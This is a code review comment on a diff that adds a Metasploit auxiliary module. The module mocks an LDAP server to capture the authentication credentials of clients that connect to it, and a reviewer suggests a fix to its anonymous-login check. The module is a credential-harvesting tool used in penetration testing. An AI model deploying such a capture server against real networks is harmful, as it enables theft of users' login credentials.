modules/auxiliary/server/capture/ldap.rb

```diff
@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'net/ldap'
+require 'net/ldap/dn'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::LDAP::Server
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Authentication Capture: LDAP',
+        'Description' => %q{
+          This module mocks an LDAP service to capture authentication
+          information of a client trying to authenticate against an LDAP service
+        },
+        'Author' => 'JustAnda7',
+        'License' => MSF_LICENSE,
+        'Action' => [
+          [ 'Capture', { 'Description' => 'Run an LDAP capture server' } ]
+        ],
+        'PassiveActions' => [ 'Capture' ],
+        'DefaultActions' => 'Capture',
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptAddress.new('SRVHOST', [ true, 'The localhost to listen on.', '0.0.0.0' ]),
+        OptPort.new('SRVPORT', [ true, 'The local port to listen on.', '389' ])
+      ]
+    )
+
+    deregister_options('LDIF_FILE')
+
+    register_advanced_options(
+      [
+        OptPath.new('LDIF_FILE', [ false, 'Directory LDIF file path'])
+      ]
+    )
+  end
+
+  def run
+    exploit
+  end
+
+  def on_dispatch_request(client, data)
+    return if data.strip.empty? || data.strip.nil?
+
+    state = {}
+
+    state[client] = {
+      name: "#{client.peerhost}:#{client.peerport}",
+      ip: client.peerhost,
+      port: client.peerport
+    }
+
+    data.extend(Net::BER::Extensions::String)
+    begin
+      pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
+      vprint_status("LDAP request data remaining: #{data}") unless data.empty?
+
+      res = case pdu.app_tag
+            when Net::LDAP::PDU::BindRequest
+              domains = []
+              names = []
+              result_code = nil
+              user_login = pdu.bind_parameters
+
+              if user_login.name.empty? || user_login.authentication.empty?
```

Comment:
Reporting anonymous login as `Success` should only be when both are emtpy.
```suggestion
              if user_login.name.empty? && user_login.authentication.empty?
```